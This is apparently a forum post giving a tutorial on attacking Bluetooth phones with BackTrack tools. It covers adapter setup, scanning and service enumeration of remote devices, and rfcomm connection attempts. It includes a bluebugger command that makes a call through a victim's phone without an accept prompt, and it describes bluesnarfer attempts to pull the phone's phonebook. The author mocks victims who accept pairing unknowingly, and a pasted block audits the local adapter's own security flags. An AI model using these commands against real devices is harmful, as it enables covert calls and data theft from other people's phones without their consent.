Assalam-o-Alaikum,
Guys, jaceon requested me to write on how to hack Bluetooth using BackTrack, so here we go. I obviously searched it out and already learned it from somewhere, and I am going to share the facts with you. Here is the tutorial Blue_ron by:
Scripts:
What do I have on my box
First, I wrote a script to configure my Bluetooth device so that I wouldn't have to keep typing the same commands every time I need to set it up. This is what it looks like:
#!/bin/sh
# Create the rfcomm device nodes (character device, major 216, minor 0)
mkdir -p /dev/bluetooth/rfcomm
mknod -m 666 /dev/bluetooth/rfcomm/0 c 216 0
mknod --mode=666 /dev/bluetooth/rfcomm0 c 216 0
# Firing up the bluetooth device
hciconfig -a hci0 up
hciconfig -a hci0 class 0x500204
hciconfig -a hci0 lm accept,master
hciconfig -a hci0 lp rswitch,hold,sniff,park
hciconfig -a hci0 auth enable
hciconfig -a hci0 encrypt enable
hciconfig -a hci0 name ronsoft
In case you want to change these settings through the config files instead, go to the Bluetooth config directory /etc/bluetooth/ and edit them with nano.
Here you have control over even more options by playing around with the conf files:
-> rfcomm.conf
-> network.conf
-> main.conf
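As an added example (not code from the original post), here is a POSIX shell check of the local adapter's state flags as printed by `hciconfig -a hci0`: it confirms that AUTH and ENCRYPT are on, as the setup script above enables them, and flags ISCAN, which means the adapter is discoverable. It assumes hciconfig's flag line layout (`UP RUNNING PSCAN ISCAN AUTH ENCRYPT`) and uses constructed sample output so it runs offline.

```shell
#!/bin/sh
# Added example, not code from the original post: audit the state flags that
# hciconfig prints for the local adapter (the "UP RUNNING PSCAN ISCAN ..."
# line). AUTH and ENCRYPT should be present, as the setup script above sets
# them; ISCAN means the adapter answers inquiries, i.e. it shows up in a
# remote `hcitool scan`.

# audit_flags: reads `hciconfig -a hci0` output on stdin, prints one finding
# per line and returns the number of findings (0 = adapter passes).
audit_flags() {
    # The flag line is the one whose first word is UP or DOWN.
    flags=$(awk '$1 == "UP" || $1 == "DOWN" { print; exit }')
    n=0
    case " $flags " in *" UP "*) ;; *)
        echo "adapter is DOWN, nothing to audit"; return 1 ;;
    esac
    case " $flags " in *" AUTH "*) ;; *)
        echo "AUTH missing: run 'hciconfig hci0 auth enable'"; n=$((n + 1)) ;;
    esac
    case " $flags " in *" ENCRYPT "*) ;; *)
        echo "ENCRYPT missing: run 'hciconfig hci0 encrypt enable'"; n=$((n + 1)) ;;
    esac
    case " $flags " in *" ISCAN "*)
        echo "ISCAN set: adapter is discoverable, run 'hciconfig hci0 pscan'"; n=$((n + 1)) ;;
    esac
    return "$n"
}

# Constructed samples in the layout of hciconfig's device header
# (hciconfig indents with a tab; spaces are used here, awk does not care).
SAMPLE_DISCOVERABLE='hci0:   Type: BR/EDR  Bus: USB
        BD Address: 00:11:22:33:44:55  ACL MTU: 1021:8  SCO MTU: 64:1
        UP RUNNING PSCAN ISCAN AUTH ENCRYPT
        RX bytes:1234 acl:0 sco:0 events:56 errors:0'
SAMPLE_WEAK='hci0:   Type: BR/EDR  Bus: USB
        UP RUNNING PSCAN
        RX bytes:1234 acl:0 sco:0 events:56 errors:0'
SAMPLE_HARDENED='hci0:   Type: BR/EDR  Bus: USB
        UP RUNNING PSCAN AUTH ENCRYPT'

# Stand-alone run over the samples; on a real box use:
#   hciconfig -a hci0 | audit_flags
for s in "$SAMPLE_DISCOVERABLE" "$SAMPLE_WEAK" "$SAMPLE_HARDENED"; do
    printf '%s\n' "$s" | audit_flags && echo "-> OK" || echo "-> $? finding(s)"
done
```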
Footprinting the remote device
Scan for devices:
hcitool scan hci0
hcitool info xx:xx:xx:xx:xx:xx
You can also ping the device to check that it is in range:
l2ping xx:xx:xx:xx:xx:xx
sdptool browse --l2cap <xx:xx:xx:xx:xx:xx>
This will list all services, channels and a lot of info about the remote device. You may wonder how this could help, but this is the gold mine of Bluetooth hacking. Take a pen and paper and note down the important services with their channel numbers, record handles and attribute values. Well-known services:
DUN - Dial up network
OBEX - Object exchange
OPUSH - Object push for file transfer
SAP - Sim access
Update your SDP database:
sdptool add --handle=<Rechandle> --channel=<channel> <service name>
sdptool add --handle=0x10013 --channel=4 SAP
Now the stress starts from here: trying to bind and then connect the rfcomm device to the remote device.
rfcomm
rfcomm bind /dev/bluetooth/rfcomm xx:xx:xx:xx:xx:xx 4
rfcomm connect /dev/bluetooth/rfcomm xx:xx:xx:xx:xx:xx 4
rfcomm show
With the above commands, my box turns into an error box. First I get the signals to the remote Bluetooth phone, but nothing can happen until I accept the request from the phone. Well, the victim may by chance just hit the accept button without knowing... hahahahaaa....! After establishing the connection, the remote device needs a 16-digit number in order to complete the pairing!
Now guys, take your turn and tell me: how do you deal with this in your own world?
I tried bluesnarfer and bluebugger but still couldn't get very far. The funny thing is that I can make a call through the remote device, but I can't pull its phonebook!
bluebugger -m Ron -c 7 -a xx:xx:xx:xx:xx:xx dial 9818303531
The call goes through successfully, even without an accept prompt on the screen; only the screen light blinks.
These are some of the errors I get when I try it with bluesnarfer and bluebugger:
bt_rfcomm_config failed
unable to create rfcomm connect
open /dev/bluetooth/rfcomm/0 connection refused
unable to create rfcomm connect
open /dev/bluetooth/rfcomm/0 connection refused
Can't connect RFCOMM socket:
tcget attr failed: Input / output error
bt_rfcomm_config() failed
tcget attr failed: Input / output error
bt_rfcomm_config() failed
rfcomm error connection 216 connection fail
RFCOMMDEV / bluetooth/ not connected.
I know it is an error, but I haven't found any solution for this. If anyone can find it, here is a better reference:
http://www.palowireless.com/infotooth/tutorial/rfcomm.asp
If I am wrong in any case, or if I get updated with more info on this topic, I will let you know.
Zulqurnain jutt
Having confusion? Oh dear, ask me in the comments!!